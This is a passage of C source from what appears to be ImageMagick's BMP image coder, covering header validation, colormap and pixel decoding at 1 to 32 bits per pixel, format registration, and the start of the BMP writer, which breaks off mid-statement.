ThrowReaderException(CorruptImageError,"NonOS2HeaderSizeError");
bmp_info.width=(ssize_t) ReadBlobLSBSignedLong(image);
bmp_info.height=(ssize_t) ReadBlobLSBSignedLong(image);
bmp_info.planes=ReadBlobLSBShort(image);
bmp_info.bits_per_pixel=ReadBlobLSBShort(image);
bmp_info.compression=ReadBlobLSBLong(image);
bmp_info.image_size=ReadBlobLSBLong(image);
bmp_info.x_pixels=ReadBlobLSBLong(image);
bmp_info.y_pixels=ReadBlobLSBLong(image);
bmp_info.number_colors=ReadBlobLSBLong(image);
bmp_info.colors_important=ReadBlobLSBLong(image);
profile_data=0;
profile_size=0;
if (image->debug != MagickFalse)
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Format: MS Windows bitmap");
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Geometry: %.20gx%.20g",(double) bmp_info.width,(double)
bmp_info.height);
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Bits per pixel: %.20g",(double) bmp_info.bits_per_pixel);
switch ((int) bmp_info.compression)
{
case BI_RGB:
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression: BI_RGB");
break;
}
case BI_RLE4:
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression: BI_RLE4");
break;
}
case BI_RLE8:
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression: BI_RLE8");
break;
}
case BI_BITFIELDS:
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression: BI_BITFIELDS");
break;
}
case BI_PNG:
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression: BI_PNG");
break;
}
case BI_JPEG:
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression: BI_JPEG");
break;
}
default:
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression: UNKNOWN (%lu)",bmp_info.compression);
}
}
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Number of colors: %lu",bmp_info.number_colors);
}
bmp_info.red_mask=ReadBlobLSBLong(image);
bmp_info.green_mask=ReadBlobLSBLong(image);
bmp_info.blue_mask=ReadBlobLSBLong(image);
if (bmp_info.size > 40)
{
double
gamma;
/*
Read color management information.
*/
bmp_info.alpha_mask=ReadBlobLSBLong(image);
bmp_info.colorspace=ReadBlobLSBSignedLong(image);
/*
Decode 2^30 fixed point formatted CIE primaries.
*/
# define BMP_DENOM ((double) 0x40000000)
bmp_info.red_primary.x=(double) ReadBlobLSBLong(image)/BMP_DENOM;
bmp_info.red_primary.y=(double) ReadBlobLSBLong(image)/BMP_DENOM;
bmp_info.red_primary.z=(double) ReadBlobLSBLong(image)/BMP_DENOM;
bmp_info.green_primary.x=(double) ReadBlobLSBLong(image)/BMP_DENOM;
bmp_info.green_primary.y=(double) ReadBlobLSBLong(image)/BMP_DENOM;
bmp_info.green_primary.z=(double) ReadBlobLSBLong(image)/BMP_DENOM;
bmp_info.blue_primary.x=(double) ReadBlobLSBLong(image)/BMP_DENOM;
bmp_info.blue_primary.y=(double) ReadBlobLSBLong(image)/BMP_DENOM;
bmp_info.blue_primary.z=(double) ReadBlobLSBLong(image)/BMP_DENOM;
gamma=bmp_info.red_primary.x+bmp_info.red_primary.y+
bmp_info.red_primary.z;
gamma=PerceptibleReciprocal(gamma);
bmp_info.red_primary.x*=gamma;
bmp_info.red_primary.y*=gamma;
image->chromaticity.red_primary.x=bmp_info.red_primary.x;
image->chromaticity.red_primary.y=bmp_info.red_primary.y;
gamma=bmp_info.green_primary.x+bmp_info.green_primary.y+
bmp_info.green_primary.z;
gamma=PerceptibleReciprocal(gamma);
bmp_info.green_primary.x*=gamma;
bmp_info.green_primary.y*=gamma;
image->chromaticity.green_primary.x=bmp_info.green_primary.x;
image->chromaticity.green_primary.y=bmp_info.green_primary.y;
gamma=bmp_info.blue_primary.x+bmp_info.blue_primary.y+
bmp_info.blue_primary.z;
gamma=PerceptibleReciprocal(gamma);
bmp_info.blue_primary.x*=gamma;
bmp_info.blue_primary.y*=gamma;
image->chromaticity.blue_primary.x=bmp_info.blue_primary.x;
image->chromaticity.blue_primary.y=bmp_info.blue_primary.y;
/*
Decode 16^16 fixed point formatted gamma_scales.
*/
bmp_info.gamma_scale.x=(double) ReadBlobLSBLong(image)/0x10000;
bmp_info.gamma_scale.y=(double) ReadBlobLSBLong(image)/0x10000;
bmp_info.gamma_scale.z=(double) ReadBlobLSBLong(image)/0x10000;
/*
Compute a single gamma from the BMP 3-channel gamma.
*/
image->gamma=(bmp_info.gamma_scale.x+bmp_info.gamma_scale.y+
bmp_info.gamma_scale.z)/3.0;
}
else
(void) CopyMagickString(image->magick,"BMP3",MagickPathExtent);
if (bmp_info.size > 108)
{
size_t
intent;
/*
Read BMP Version 5 color management information.
*/
intent=ReadBlobLSBLong(image);
switch ((int) intent)
{
case LCS_GM_BUSINESS:
{
image->rendering_intent=SaturationIntent;
break;
}
case LCS_GM_GRAPHICS:
{
image->rendering_intent=RelativeIntent;
break;
}
case LCS_GM_IMAGES:
{
image->rendering_intent=PerceptualIntent;
break;
}
case LCS_GM_ABS_COLORIMETRIC:
{
image->rendering_intent=AbsoluteIntent;
break;
}
}
profile_data=ReadBlobLSBLong(image);
profile_size=ReadBlobLSBLong(image);
(void) profile_data;
(void) profile_size;
(void) ReadBlobLSBLong(image); /* Reserved byte */
}
}
if ((MagickSizeType) bmp_info.file_size > GetBlobSize(image))
(void) ThrowMagickException(exception,GetMagickModule(),CorruptImageError,
"LengthAndFilesizeDoNotMatch","`%s'",image->filename);
else
if ((MagickSizeType) bmp_info.file_size < GetBlobSize(image))
(void) ThrowMagickException(exception,GetMagickModule(),
CorruptImageWarning,"LengthAndFilesizeDoNotMatch","`%s'",
image->filename);
if (bmp_info.width <= 0)
ThrowReaderException(CorruptImageError,"NegativeOrZeroImageSize");
if (bmp_info.height == 0)
ThrowReaderException(CorruptImageError,"NegativeOrZeroImageSize");
if (bmp_info.planes != 1)
ThrowReaderException(CorruptImageError,"StaticPlanesValueNotEqualToOne");
if ((bmp_info.bits_per_pixel != 1) && (bmp_info.bits_per_pixel != 4) &&
(bmp_info.bits_per_pixel != 8) && (bmp_info.bits_per_pixel != 16) &&
(bmp_info.bits_per_pixel != 24) && (bmp_info.bits_per_pixel != 32))
ThrowReaderException(CorruptImageError,"UnrecognizedBitsPerPixel");
if (bmp_info.bits_per_pixel < 16 &&
bmp_info.number_colors > (1U << bmp_info.bits_per_pixel))
ThrowReaderException(CorruptImageError,"UnrecognizedNumberOfColors");
if ((bmp_info.compression == 1) && (bmp_info.bits_per_pixel != 8))
ThrowReaderException(CorruptImageError,"UnrecognizedBitsPerPixel");
if ((bmp_info.compression == 2) && (bmp_info.bits_per_pixel != 4))
ThrowReaderException(CorruptImageError,"UnrecognizedBitsPerPixel");
if ((bmp_info.compression == 3) && (bmp_info.bits_per_pixel < 16))
ThrowReaderException(CorruptImageError,"UnrecognizedBitsPerPixel");
switch (bmp_info.compression)
{
case BI_RGB:
image->compression=NoCompression;
break;
case BI_RLE8:
case BI_RLE4:
image->compression=RLECompression;
break;
case BI_BITFIELDS:
break;
case BI_JPEG:
ThrowReaderException(CoderError,"JPEGCompressNotSupported");
case BI_PNG:
ThrowReaderException(CoderError,"PNGCompressNotSupported");
default:
ThrowReaderException(CorruptImageError,"UnrecognizedImageCompression");
}
image->columns=(size_t) MagickAbsoluteValue(bmp_info.width);
image->rows=(size_t) MagickAbsoluteValue(bmp_info.height);
image->depth=bmp_info.bits_per_pixel <= 8 ? bmp_info.bits_per_pixel : 8;
image->alpha_trait=((bmp_info.alpha_mask != 0) &&
(bmp_info.compression == BI_BITFIELDS)) ? BlendPixelTrait :
UndefinedPixelTrait;
if (bmp_info.bits_per_pixel < 16)
{
size_t
one;
image->storage_class=PseudoClass;
image->colors=bmp_info.number_colors;
one=1;
if (image->colors == 0)
image->colors=one << bmp_info.bits_per_pixel;
}
if (image->storage_class == PseudoClass)
{
unsigned char
*bmp_colormap;
size_t
packet_size;
/*
Read BMP raster colormap.
*/
if (image->debug != MagickFalse)
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Reading colormap of %.20g colors",(double) image->colors);
if (AcquireImageColormap(image,image->colors,exception) == MagickFalse)
ThrowReaderException(ResourceLimitError,"MemoryAllocationFailed");
bmp_colormap=(unsigned char *) AcquireQuantumMemory((size_t)
image->colors,4*sizeof(*bmp_colormap));
if (bmp_colormap == (unsigned char *) NULL)
ThrowReaderException(ResourceLimitError,"MemoryAllocationFailed");
if ((bmp_info.size == 12) || (bmp_info.size == 64))
packet_size=3;
else
packet_size=4;
offset=SeekBlob(image,start_position+14+bmp_info.size,SEEK_SET);
if (offset < 0)
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
count=ReadBlob(image,packet_size*image->colors,bmp_colormap);
if (count != (ssize_t) (packet_size*image->colors))
ThrowReaderException(CorruptImageError,"InsufficientImageDataInFile");
p=bmp_colormap;
for (i=0; i < (ssize_t) image->colors; i++)
{
image->colormap[i].blue=(MagickRealType) ScaleCharToQuantum(*p++);
image->colormap[i].green=(MagickRealType) ScaleCharToQuantum(*p++);
image->colormap[i].red=(MagickRealType) ScaleCharToQuantum(*p++);
if (packet_size == 4)
p++;
}
bmp_colormap=(unsigned char *) RelinquishMagickMemory(bmp_colormap);
}
image->resolution.x=(double) bmp_info.x_pixels/100.0;
image->resolution.y=(double) bmp_info.y_pixels/100.0;
image->units=PixelsPerCentimeterResolution;
if ((image_info->ping != MagickFalse) && (image_info->number_scenes != 0))
if (image->scene >= (image_info->scene+image_info->number_scenes-1))
break;
status=SetImageExtent(image,image->columns,image->rows,exception);
if (status == MagickFalse)
return(DestroyImageList(image));
/*
Read image data.
*/
offset=SeekBlob(image,start_position+bmp_info.offset_bits,SEEK_SET);
if (offset < 0)
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
if (bmp_info.compression == BI_RLE4)
bmp_info.bits_per_pixel<<=1;
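/*
BMP scanlines are padded to 32-bit (4 byte) boundaries.
*/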
bytes_per_line=4*((image->columns*bmp_info.bits_per_pixel+31)/32);
length=(size_t) bytes_per_line*image->rows;
pixel_info=AcquireVirtualMemory((size_t) image->rows,
MagickMax(bytes_per_line,image->columns+256UL)*sizeof(*pixels));
if (pixel_info == (MemoryInfo *) NULL)
ThrowReaderException(ResourceLimitError,"MemoryAllocationFailed");
pixels=(unsigned char *) GetVirtualMemoryBlob(pixel_info);
if ((bmp_info.compression == BI_RGB) ||
(bmp_info.compression == BI_BITFIELDS))
{
if (image->debug != MagickFalse)
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Reading pixels (%.20g bytes)",(double) length);
count=ReadBlob(image,length,pixels);
if (count != (ssize_t) length)
{
pixel_info=RelinquishVirtualMemory(pixel_info);
ThrowReaderException(CorruptImageError,
"InsufficientImageDataInFile");
}
}
else
{
/*
Convert run-length encoded raster pixels.
*/
status=DecodeImage(image,bmp_info.compression,pixels);
if (status == MagickFalse)
{
pixel_info=RelinquishVirtualMemory(pixel_info);
ThrowReaderException(CorruptImageError,
"UnableToRunlengthDecodeImage");
}
}
/*
Convert BMP raster image to pixel packets.
*/
if (bmp_info.compression == BI_RGB)
{
/*
We should ignore the alpha value in BMP3 files, but there have been
reports of 32-bit files with alpha. We do a quick check to see if
the alpha channel contains a value that is not zero (the default value).
If we find a non-zero value we assume the program that wrote the file
wants to use the alpha channel.
*/
if ((image->alpha_trait == UndefinedPixelTrait) && (bmp_info.size == 40) &&
(bmp_info.bits_per_pixel == 32))
{
bytes_per_line=4*(image->columns);
for (y=(ssize_t) image->rows-1; y >= 0; y--)
{
p=pixels+(image->rows-y-1)*bytes_per_line;
for (x=0; x < (ssize_t) image->columns; x++)
{
if (*(p+3) != 0)
{
image->alpha_trait=BlendPixelTrait;
y=-1;
break;
}
p+=4;
}
}
}
bmp_info.alpha_mask=image->alpha_trait != UndefinedPixelTrait ?
0xff000000U : 0U;
bmp_info.red_mask=0x00ff0000U;
bmp_info.green_mask=0x0000ff00U;
bmp_info.blue_mask=0x000000ffU;
if (bmp_info.bits_per_pixel == 16)
{
/*
RGB555.
*/
bmp_info.red_mask=0x00007c00U;
bmp_info.green_mask=0x000003e0U;
bmp_info.blue_mask=0x0000001fU;
}
}
(void) ResetMagickMemory(&shift,0,sizeof(shift));
(void) ResetMagickMemory(&quantum_bits,0,sizeof(quantum_bits));
if ((bmp_info.bits_per_pixel == 16) || (bmp_info.bits_per_pixel == 32))
{
register size_t
sample;
/*
Get shift and quantum bits info from bitfield masks.
*/
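/*
shift.* is how far each channel mask must be shifted left to bring its top
bit to bit 31; quantum_bits.* is the width of the mask in bits, used below
to replicate high-order bits into the low-order bits when widening samples.
*/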
if (bmp_info.red_mask != 0)
while (((bmp_info.red_mask << shift.red) & 0x80000000UL) == 0)
shift.red++;
if (bmp_info.green_mask != 0)
while (((bmp_info.green_mask << shift.green) & 0x80000000UL) == 0)
shift.green++;
if (bmp_info.blue_mask != 0)
while (((bmp_info.blue_mask << shift.blue) & 0x80000000UL) == 0)
shift.blue++;
if (bmp_info.alpha_mask != 0)
while (((bmp_info.alpha_mask << shift.alpha) & 0x80000000UL) == 0)
shift.alpha++;
sample=shift.red;
while (((bmp_info.red_mask << sample) & 0x80000000UL) != 0)
sample++;
quantum_bits.red=(MagickRealType) (sample-shift.red);
sample=shift.green;
while (((bmp_info.green_mask << sample) & 0x80000000UL) != 0)
sample++;
quantum_bits.green=(MagickRealType) (sample-shift.green);
sample=shift.blue;
while (((bmp_info.blue_mask << sample) & 0x80000000UL) != 0)
sample++;
quantum_bits.blue=(MagickRealType) (sample-shift.blue);
sample=shift.alpha;
while (((bmp_info.alpha_mask << sample) & 0x80000000UL) != 0)
sample++;
quantum_bits.alpha=(MagickRealType) (sample-shift.alpha);
}
switch (bmp_info.bits_per_pixel)
{
case 1:
{
/*
Convert bitmap scanline.
*/
for (y=(ssize_t) image->rows-1; y >= 0; y--)
{
p=pixels+(image->rows-y-1)*bytes_per_line;
q=QueueAuthenticPixels(image,0,y,image->columns,1,exception);
if (q == (Quantum *) NULL)
break;
for (x=0; x < ((ssize_t) image->columns-7); x+=8)
{
for (bit=0; bit < 8; bit++)
{
index=(Quantum) (((*p) & (0x80 >> bit)) != 0 ? 0x01 : 0x00);
SetPixelIndex(image,index,q);
q+=GetPixelChannels(image);
}
p++;
}
if ((image->columns % 8) != 0)
{
for (bit=0; bit < (image->columns % 8); bit++)
{
index=(Quantum) (((*p) & (0x80 >> bit)) != 0 ? 0x01 : 0x00);
SetPixelIndex(image,index,q);
q+=GetPixelChannels(image);
}
p++;
}
if (SyncAuthenticPixels(image,exception) == MagickFalse)
break;
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,LoadImageTag,(MagickOffsetType)
(image->rows-y),image->rows);
if (status == MagickFalse)
break;
}
}
(void) SyncImage(image,exception);
break;
}
case 4:
{
/*
Convert PseudoColor scanline.
*/
for (y=(ssize_t) image->rows-1; y >= 0; y--)
{
p=pixels+(image->rows-y-1)*bytes_per_line;
q=QueueAuthenticPixels(image,0,y,image->columns,1,exception);
if (q == (Quantum *) NULL)
break;
for (x=0; x < ((ssize_t) image->columns-1); x+=2)
{
ValidateColormapValue(image,(*p >> 4) & 0x0f,&index,exception);
SetPixelIndex(image,index,q);
q+=GetPixelChannels(image);
ValidateColormapValue(image,*p & 0x0f,&index,exception);
SetPixelIndex(image,index,q);
q+=GetPixelChannels(image);
p++;
}
if ((image->columns % 2) != 0)
{
ValidateColormapValue(image,(*p >> 4) & 0xf,&index,exception);
SetPixelIndex(image,index,q);
q+=GetPixelChannels(image);
p++;
x++;
}
if (x < (ssize_t) image->columns)
break;
if (SyncAuthenticPixels(image,exception) == MagickFalse)
break;
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,LoadImageTag,(MagickOffsetType)
(image->rows-y),image->rows);
if (status == MagickFalse)
break;
}
}
(void) SyncImage(image,exception);
break;
}
case 8:
{
/*
Convert PseudoColor scanline.
*/
if ((bmp_info.compression == BI_RLE8) ||
(bmp_info.compression == BI_RLE4))
bytes_per_line=image->columns;
for (y=(ssize_t) image->rows-1; y >= 0; y--)
{
p=pixels+(image->rows-y-1)*bytes_per_line;
q=QueueAuthenticPixels(image,0,y,image->columns,1,exception);
if (q == (Quantum *) NULL)
break;
for (x=(ssize_t) image->columns; x != 0; --x)
{
ValidateColormapValue(image,*p++,&index,exception);
SetPixelIndex(image,index,q);
q+=GetPixelChannels(image);
}
if (x > 0)
break;
if (SyncAuthenticPixels(image,exception) == MagickFalse)
break;
offset=(MagickOffsetType) (image->rows-y-1);
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,LoadImageTag,(MagickOffsetType)
(image->rows-y),image->rows);
if (status == MagickFalse)
break;
}
}
(void) SyncImage(image,exception);
break;
}
case 16:
{
size_t
alpha,
pixel;
/*
Convert bitfield encoded 16-bit PseudoColor scanline.
*/
if (bmp_info.compression != BI_RGB &&
bmp_info.compression != BI_BITFIELDS)
{
pixel_info=RelinquishVirtualMemory(pixel_info);
ThrowReaderException(CorruptImageError,
"UnrecognizedImageCompression");
}
bytes_per_line=2*(image->columns+image->columns % 2);
image->storage_class=DirectClass;
for (y=(ssize_t) image->rows-1; y >= 0; y--)
{
p=pixels+(image->rows-y-1)*bytes_per_line;
q=QueueAuthenticPixels(image,0,y,image->columns,1,exception);
if (q == (Quantum *) NULL)
break;
for (x=0; x < (ssize_t) image->columns; x++)
{
pixel=(size_t) (*p++);
pixel|=(*p++) << 8;
red=((pixel & bmp_info.red_mask) << shift.red) >> 16;
if (quantum_bits.red == 5)
red|=((red & 0xe000) >> 5);
if (quantum_bits.red <= 8)
red|=((red & 0xff00) >> 8);
green=((pixel & bmp_info.green_mask) << shift.green) >> 16;
if (quantum_bits.green == 5)
green|=((green & 0xe000) >> 5);
if (quantum_bits.green == 6)
green|=((green & 0xc000) >> 6);
if (quantum_bits.green <= 8)
green|=((green & 0xff00) >> 8);
blue=((pixel & bmp_info.blue_mask) << shift.blue) >> 16;
if (quantum_bits.blue == 5)
blue|=((blue & 0xe000) >> 5);
if (quantum_bits.blue <= 8)
blue|=((blue & 0xff00) >> 8);
SetPixelRed(image,ScaleShortToQuantum((unsigned short) red),q);
SetPixelGreen(image,ScaleShortToQuantum((unsigned short) green),q);
SetPixelBlue(image,ScaleShortToQuantum((unsigned short) blue),q);
SetPixelAlpha(image,OpaqueAlpha,q);
if (image->alpha_trait != UndefinedPixelTrait)
{
alpha=((pixel & bmp_info.alpha_mask) << shift.alpha) >> 16;
if (quantum_bits.alpha <= 8)
alpha|=((alpha & 0xff00) >> 8);
SetPixelAlpha(image,ScaleShortToQuantum(
(unsigned short) alpha),q);
}
q+=GetPixelChannels(image);
}
if (SyncAuthenticPixels(image,exception) == MagickFalse)
break;
offset=(MagickOffsetType) (image->rows-y-1);
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,LoadImageTag,(MagickOffsetType)
(image->rows-y),image->rows);
if (status == MagickFalse)
break;
}
}
break;
}
case 24:
{
/*
Convert DirectColor scanline.
*/
bytes_per_line=4*((image->columns*24+31)/32);
for (y=(ssize_t) image->rows-1; y >= 0; y--)
{
p=pixels+(image->rows-y-1)*bytes_per_line;
q=QueueAuthenticPixels(image,0,y,image->columns,1,exception);
if (q == (Quantum *) NULL)
break;
for (x=0; x < (ssize_t) image->columns; x++)
{
SetPixelBlue(image,ScaleCharToQuantum(*p++),q);
SetPixelGreen(image,ScaleCharToQuantum(*p++),q);
SetPixelRed(image,ScaleCharToQuantum(*p++),q);
SetPixelAlpha(image,OpaqueAlpha,q);
q+=GetPixelChannels(image);
}
if (SyncAuthenticPixels(image,exception) == MagickFalse)
break;
offset=(MagickOffsetType) (image->rows-y-1);
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,LoadImageTag,(MagickOffsetType)
(image->rows-y),image->rows);
if (status == MagickFalse)
break;
}
}
break;
}
case 32:
{
/*
Convert bitfield encoded DirectColor scanline.
*/
if ((bmp_info.compression != BI_RGB) &&
(bmp_info.compression != BI_BITFIELDS))
{
pixel_info=RelinquishVirtualMemory(pixel_info);
ThrowReaderException(CorruptImageError,
"UnrecognizedImageCompression");
}
bytes_per_line=4*(image->columns);
for (y=(ssize_t) image->rows-1; y >= 0; y--)
{
size_t
alpha,
pixel;
p=pixels+(image->rows-y-1)*bytes_per_line;
q=QueueAuthenticPixels(image,0,y,image->columns,1,exception);
if (q == (Quantum *) NULL)
break;
for (x=0; x < (ssize_t) image->columns; x++)
{
pixel=(size_t) (*p++);
pixel|=((size_t) *p++ << 8);
pixel|=((size_t) *p++ << 16);
pixel|=((size_t) *p++ << 24);
red=((pixel & bmp_info.red_mask) << shift.red) >> 16;
if (quantum_bits.red == 8)
red|=(red >> 8);
green=((pixel & bmp_info.green_mask) << shift.green) >> 16;
if (quantum_bits.green == 8)
green|=(green >> 8);
blue=((pixel & bmp_info.blue_mask) << shift.blue) >> 16;
if (quantum_bits.blue == 8)
blue|=(blue >> 8);
SetPixelRed(image,ScaleShortToQuantum((unsigned short) red),q);
SetPixelGreen(image,ScaleShortToQuantum((unsigned short) green),q);
SetPixelBlue(image,ScaleShortToQuantum((unsigned short) blue),q);
SetPixelAlpha(image,OpaqueAlpha,q);
if (image->alpha_trait != UndefinedPixelTrait)
{
alpha=((pixel & bmp_info.alpha_mask) << shift.alpha) >> 16;
if (quantum_bits.alpha == 8)
alpha|=(alpha >> 8);
SetPixelAlpha(image,ScaleShortToQuantum(
(unsigned short) alpha),q);
}
q+=GetPixelChannels(image);
}
if (SyncAuthenticPixels(image,exception) == MagickFalse)
break;
offset=(MagickOffsetType) (image->rows-y-1);
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,LoadImageTag,(MagickOffsetType)
(image->rows-y),image->rows);
if (status == MagickFalse)
break;
}
}
break;
}
default:
{
pixel_info=RelinquishVirtualMemory(pixel_info);
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
}
}
pixel_info=RelinquishVirtualMemory(pixel_info);
if (y > 0)
break;
if (EOFBlob(image) != MagickFalse)
{
ThrowFileException(exception,CorruptImageError,"UnexpectedEndOfFile",
image->filename);
break;
}
if (bmp_info.height < 0)
{
Image
*flipped_image;
/*
Correct image orientation: a negative height in the BMP header means the
scanlines were stored top-down, so flip the bottom-up image just decoded.
*/
flipped_image=FlipImage(image,exception);
if (flipped_image != (Image *) NULL)
{
DuplicateBlob(flipped_image,image);
image=DestroyImage(image);
image=flipped_image;
}
}
/*
Proceed to next image.
*/
if (image_info->number_scenes != 0)
if (image->scene >= (image_info->scene+image_info->number_scenes-1))
break;
*magick='\0';
if (bmp_info.ba_offset != 0)
{
offset=SeekBlob(image,(MagickOffsetType) bmp_info.ba_offset,SEEK_SET);
if (offset < 0)
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
}
count=ReadBlob(image,2,magick);
if ((count == 2) && (IsBMP(magick,2) != MagickFalse))
{
/*
Acquire next image structure.
*/
AcquireNextImage(image_info,image,exception);
if (GetNextImageInList(image) == (Image *) NULL)
{
image=DestroyImageList(image);
return((Image *) NULL);
}
image=SyncNextImageInList(image);
status=SetImageProgress(image,LoadImagesTag,TellBlob(image),
GetBlobSize(image));
if (status == MagickFalse)
break;
}
} while (IsBMP(magick,2) != MagickFalse);
(void) CloseBlob(image);
return(GetFirstImageInList(image));
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% R e g i s t e r B M P I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% RegisterBMPImage() adds attributes for the BMP image format to
% the list of supported formats. The attributes include the image format
% tag, a method to read and/or write the format, whether the format
% supports the saving of more than one frame to the same file or blob,
% whether the format supports native in-memory I/O, and a brief
% description of the format.
%
% The format of the RegisterBMPImage method is:
%
% size_t RegisterBMPImage(void)
%
*/
ModuleExport size_t RegisterBMPImage(void)
{
MagickInfo
*entry;
entry=AcquireMagickInfo("BMP","BMP","Microsoft Windows bitmap image");
entry->decoder=(DecodeImageHandler *) ReadBMPImage;
entry->encoder=(EncodeImageHandler *) WriteBMPImage;
entry->magick=(IsImageFormatHandler *) IsBMP;
entry->flags^=CoderAdjoinFlag;
entry->flags|=CoderSeekableStreamFlag;
(void) RegisterMagickInfo(entry);
entry=AcquireMagickInfo("BMP","BMP2","Microsoft Windows bitmap image (V2)");
entry->encoder=(EncodeImageHandler *) WriteBMPImage;
entry->magick=(IsImageFormatHandler *) IsBMP;
entry->flags^=CoderAdjoinFlag;
entry->flags|=CoderSeekableStreamFlag;
(void) RegisterMagickInfo(entry);
entry=AcquireMagickInfo("BMP","BMP3","Microsoft Windows bitmap image (V3)");
entry->encoder=(EncodeImageHandler *) WriteBMPImage;
entry->magick=(IsImageFormatHandler *) IsBMP;
entry->flags^=CoderAdjoinFlag;
entry->flags|=CoderSeekableStreamFlag;
(void) RegisterMagickInfo(entry);
return(MagickImageCoderSignature);
}
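/*
  Illustrative sketch (not part of the original coder): once RegisterBMPImage()
  has run, MagickCore resolves the "BMP" magick tag and dispatches to
  ReadBMPImage() through the generic ReadImage() entry point.  The helper name
  and the file name "input.bmp" are assumptions made for this example.
*/
#if 0
#include <MagickCore/MagickCore.h>

static Image *ReadSampleBMP(ExceptionInfo *exception)
{
  Image
    *image;

  ImageInfo
    *image_info;

  image_info=AcquireImageInfo();
  (void) CopyMagickString(image_info->filename,"input.bmp",MagickPathExtent);
  image=ReadImage(image_info,exception);  /* dispatches to ReadBMPImage() */
  image_info=DestroyImageInfo(image_info);
  return(image);
}
#endif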
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% U n r e g i s t e r B M P I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% UnregisterBMPImage() removes format registrations made by the
% BMP module from the list of supported formats.
%
% The format of the UnregisterBMPImage method is:
%
% UnregisterBMPImage(void)
%
*/
ModuleExport void UnregisterBMPImage(void)
{
(void) UnregisterMagickInfo("BMP");
(void) UnregisterMagickInfo("BMP2");
(void) UnregisterMagickInfo("BMP3");
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% W r i t e B M P I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% WriteBMPImage() writes an image in Microsoft Windows bitmap encoded
% image format, version 3 for Windows or (if the image has a matte channel)
% version 4.
%
% The format of the WriteBMPImage method is:
%
% MagickBooleanType WriteBMPImage(const ImageInfo *image_info,
% Image *image,ExceptionInfo *exception)
%
% A description of each parameter follows.
%
% o image_info: the image info.
%
% o image: The image.
%
% o exception: return any errors or warnings in this structure.
%
*/
static MagickBooleanType WriteBMPImage(const ImageInfo *image_info,Image *image,
ExceptionInfo *exception)
{
BMPInfo
bmp_info;
const char
*option;
const StringInfo
*profile;
MagickBooleanType
have_color_info,
status;
MagickOffsetType
scene;
MemoryInfo
*pixel_info;
register const Quantum
*p;
register ssize_t
i,
x;
register unsigned char
*q;
size_t
bytes_per_line,
type;
ssize_t
y;
unsigned char
*bmp_data,
*pixels;
/*
Open output image file.
*/
assert(image_info != (const ImageInfo *) NULL);
assert(image_info->signature == MagickCoreSignature);
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
assert(exception != (ExceptionInfo *) NULL);
assert(exception->signature == MagickCoreSignature);
status=OpenBlob(image_info,image,WriteBinaryBlobMode,exception);
if (status == MagickFalse)
return(status);
type=4;
if (LocaleCompare(image_info->magick,"BMP2") == 0)
type=2;
else
if (LocaleCompare(image_info->magick,"BMP3") == 0)
type=3;
option=GetImageOption(image_info,"bmp:format");
if (option != (char *) NULL)
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Format=%s",option);
if (LocaleCompare(option,"bmp2") == 0)
type=2;
if (LocaleCompare(option,"bmp3") == 0)
type=3;
if (LocaleCompare(option,"bmp4") == 0)
type=4;
}
scene=0;
do
{
/*
Initialize BMP raster file header.
*/
(void) TransformImageColorspace(image,sRGBColorspace,exception);
(void) ResetMagickMemory(&bmp_info,0,sizeof(bmp_info));
bmp_info.file_size=14+12;
if (type > 2)
bmp_info.file_size+=28;
bmp_info.offset_bits=bmp_info.file_size;
bmp_info.compression=BI_RGB;
if ((image->storage_class == PseudoClass) && (image->colors > 256))
(void) SetImageStorageClass(image,DirectClass,exception);
if (image->storage_class != DirectClass)
{
/*
Colormapped BMP raster.
*/
bmp_info.bits_per_pixel=8;
if (image->colors <= 2)
bmp_info.bits_per_pixel=1;
else
if (image->colors <= 16)
bmp_info.bits_per_pixel=4;
else
if (image->colors <= 256)
bmp_info.bits_per_pixel=8;
if (image_info->compression == RLECompression)
bmp_info.bits_per_pixel=8;
bmp_info.number_colors=1U << bmp_info.bits_per_pixel;
if (image->alpha_trait != UndefinedPixelTrait)
(void) SetImageStorageClass(image,DirectClass,exception);
else
if ((size_t) bmp_info.number_colors < image->colors)
